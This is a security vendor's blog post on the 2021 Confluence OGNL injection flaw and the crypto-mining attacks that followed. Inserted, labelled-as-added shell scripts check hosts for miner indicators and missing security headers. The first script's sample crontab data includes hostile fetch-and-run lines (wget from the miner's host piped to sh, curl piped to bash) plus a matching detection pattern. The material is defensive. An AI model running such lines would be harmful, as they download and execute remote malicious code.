Current security vulnerability in Confluence

ld - 5 min read
06. Sep. 21

The Confluence vulnerability announced by Atlassian on 26 August 2021 has been exploited in recent days to gain access to systems running the affected Confluence versions.

In most cases, those who exploited the vulnerability did not steal data, but in some cases they successfully used the compromised machines (servers, VMs, etc.) as crypto-mining bots in a crypto-mining botnet.

What is mining?

To simplify things, the process known as mining describes the creation of new transaction blocks between mining bots. Currency is thus exchanged in a bot-net and the "miner" receives newly created coins. The miner can then use these coins for personal gain, for example by spending the cryptocurrency on items bought over the internet. This process is called crypto mining.

How does hacking work?

To give you a more accurate insight into the hacking process, we explain the procedure in a little more detail: via an OGNL injection, malicious code can be injected into a Java-based web application or corporate environment. OGNL, or Object-Graph Navigation Language, is an open-source expression language for Java objects. In particular, OGNL enables the evaluation of expression languages in Apache Struts, a framework for developing Java web applications such as Jira or Confluence. The most critical vulnerabilities on the list of Apache Struts CVEs relate to OGNL expression injection attacks that allow the evaluation of invalid expressions against the value stack. This allows an attacker to modify system variables or execute arbitrary code.

Code passed by a malicious person can then be executed remotely. The infiltrated script then downloads another script, which is transferred from another source via the curl or wget command. Once downloaded, it executes itself and deletes all traces of the installation data. This makes it much harder for monitoring tools to analyse and track its execution.

The installed code uses the crontab, a scheduled task feature that most operating systems come with, and manipulates the user's crontab to download binaries every minute, for example from bash.givemexyz.in, such as kdevtmpfsi. After these binaries have been downloaded, the actual mining process begins.

In some cases, the system is searched for known hosts and SSH keys in order to infect further systems.

The miner then uses the entire resources of the system to obtain cryptocurrencies.

How to notice that your system has been accessed:

The most obvious sign is constant 100% utilisation of the system's CPU for an extended period of time. You will also find suspicious crontab entries in /var/spool/cron/crontabs/. In most cases, the Confluence application will stop, but there are a few Confluence processes that can run without the Java runtime environment. Usually the miner will create and use files in /tmp/. In most cases you will find kinsing files on your system.
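The indicators listed above (crontab entries that fetch and run something every minute, miner files in /tmp/, a process pinning the CPU, the kinsing and kdevtmpfsi names) can be checked with a small script. The following is an added example, not part of the original post or of any venITure tooling; the indicator names are taken from the text, the CPU threshold of 90% is an assumption, and the crontab and ps samples are constructed for the offline demonstration.

```shell
#!/bin/sh
# Post-compromise indicator checks for the signs described in the post.
# Assumptions: the names kinsing, kdevtmpfsi and bash.givemexyz.in come from
# the text; the 90% CPU threshold is an assumed value, not from the post.

# Crontab lines that run a fetch every minute, or that name the miner/host.
CRON_PATTERN='\* \* \* \* \*.*(curl|wget)|givemexyz|kdevtmpfsi|kinsing'

# scan_cron_text: count suspicious lines in crontab text read from stdin.
scan_cron_text() {
    grep -Ec "$CRON_PATTERN" || true
}

# scan_cron_dir: count suspicious lines across every file in a crontab spool
# directory (e.g. /var/spool/cron/crontabs). Prints 0 if the directory is absent.
scan_cron_dir() {
    [ -d "$1" ] || { echo 0; return 0; }
    cat "$1"/* 2>/dev/null | scan_cron_text
}

# scan_ps_text: read `ps -eo pcpu,comm` output on stdin and print the names of
# processes that either exceed the CPU threshold or match the miner names.
scan_ps_text() {
    awk -v t="${1:-90}" 'NR > 1 && ($1 + 0 > t || $2 ~ /kinsing|kdevtmpfsi/) { print $2 }'
}

# find_tmp_indicators: list files directly under a directory (normally /tmp)
# whose names match the miner binaries mentioned in the post.
find_tmp_indicators() {
    find "$1" -maxdepth 1 \( -name 'kinsing*' -o -name 'kdevtmpfsi*' \) 2>/dev/null
}

# run_live_checks: run the three checks against the running host.
run_live_checks() {
    echo "suspicious crontab lines (spool): $(scan_cron_dir /var/spool/cron/crontabs)"
    echo "suspicious crontab lines (user):  $(crontab -l 2>/dev/null | scan_cron_text)"
    echo "suspicious processes:"; ps -eo pcpu,comm | scan_ps_text 90
    echo "miner files in /tmp:"; find_tmp_indicators /tmp
}

# Constructed sample inputs (not real captures) so the checks can be tried offline.
SAMPLE_CRON='0 2 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - bash.givemexyz.in | sh
* * * * * curl -fsSL http://example.invalid/PLACEHOLDER | bash'

SAMPLE_PS='%CPU COMMAND
  0.3 java
 99.8 kdevtmpfsi
  0.1 sshd'

# Run the live checks only when explicitly asked: ./check.sh --live
[ "${1:-}" = "--live" ] && run_live_checks
```

Against the constructed samples, scan_cron_text reports the two every-minute fetch lines and scan_ps_text reports kdevtmpfsi; on a real host, run the script with --live and treat any hit as a reason to isolate the machine and preserve /tmp and the crontab spool before cleaning up.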

How venITure helps you prevent abuse:

To prevent abuse, you can enable a content security policy to prevent cross-site scripting, clickjacking and other code injection attacks that result from running malicious content in the trusted web page context.

Implement HTTP headers such as 'Strict-Transport-Security', 'Content-Security-Policy', 'X-Frame-Options', 'X-Content-Type-Options', 'Referrer-Policy' and 'Permissions-Policy'. All of these headers enforce policies that make access to the respective resources much more difficult. This can prevent hackers from abusing your web application to gain access to your server.
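Once the headers are configured, it is worth verifying from the outside that the application actually sends them. The script below is an added example, not code from the original post; it reads raw HTTP response headers (from curl -sI against a URL you supply, or from any text on stdin) and prints which of the six headers named above are missing. The sample response used for the offline check is constructed, not captured from a real Confluence instance.

```shell
#!/bin/sh
# Check an HTTP response for the security headers named in the post.
# The list of headers is taken from the text; everything else is an assumption.

REQUIRED_HEADERS='strict-transport-security content-security-policy x-frame-options x-content-type-options referrer-policy permissions-policy'

# missing_headers: read raw response headers on stdin, print one line per
# required header that is absent (header names compared case-insensitively).
missing_headers() {
    present=$(tr -d '\r' | awk -F: '/^[A-Za-z-]+:/ { print tolower($1) }')
    for h in $REQUIRED_HEADERS; do
        printf '%s\n' "$present" | grep -qx "$h" || echo "$h"
    done
}

# check_url: fetch only the headers of a URL and report what is missing.
check_url() {
    curl -sI "$1" | missing_headers
}

# Constructed sample response: three of the six headers are set.
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src '"'"'self'"'"'
X-Frame-Options: DENY'

# Usage: ./headers.sh https://confluence.example.invalid/
[ -n "${1:-}" ] && check_url "$1"
```

Run against the constructed sample, the function reports x-content-type-options, referrer-policy and permissions-policy as missing; against a live instance, an empty result means all six headers are present, although it says nothing about whether their values are strict enough.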

A web application firewall (WAF) is a special form of application firewall that filters, monitors and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks that exploit known vulnerabilities in a web application, such as SQL injection, cross-site scripting (XSS), file inclusion, and improper system configuration.

Atlassian recommends updating Confluence to the latest and most secure version.

If you have further questions on the topic or need support in implementing prevention measures, please feel free to contact us. 
